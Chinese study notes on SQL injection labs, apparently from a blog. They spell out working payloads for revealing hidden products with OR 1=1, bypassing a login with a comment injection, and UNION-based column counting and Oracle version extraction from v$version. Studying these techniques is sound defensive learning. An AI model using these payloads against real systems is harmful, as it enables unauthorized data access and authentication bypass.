sql注入
1.WHERE条款中允许检索隐藏数据的SQL注入漏洞
网页逻辑

选择礼物栏时
原始sql
SELECT * FROM products
WHERE category = 'Gifts' AND released = 1
注入语句
category=Gifts'+OR+1=1 --
... WHERE category = 'Gifts' OR 1=1 -- ' AND released = 1

2.SQL注入漏洞允许绕过登录
网页逻辑

原始sql
SELECT * FROM users
WHERE username = '$username'
AND password = '$password'
注入语句
输入用户名=administrator'--
SELECT * FROM users
WHERE username = 'administrator'-- ' AND password = 'anything'

3.SQL注入攻击,查询Oracle数据库的类型和版本
选择礼物栏

确定列数
category=Gifts'+UNION+SELECT+NULL+FROM+dual--
报错,不是一列

category=Gifts'+UNION+SELECT+NULL,NULL+FROM+dual--
返回正确,是两列

确定哪些列可以显示文本
category=Gifts'+UNION+SELECT+'abc','def'+FROM+dual--

页面显示abc,def,说明两列都可以显示文本
查看版本
category=Gifts'+UNION+SELECT+BANNER,+NULL+FROM+v$version--

浙公网安备 33010602011771号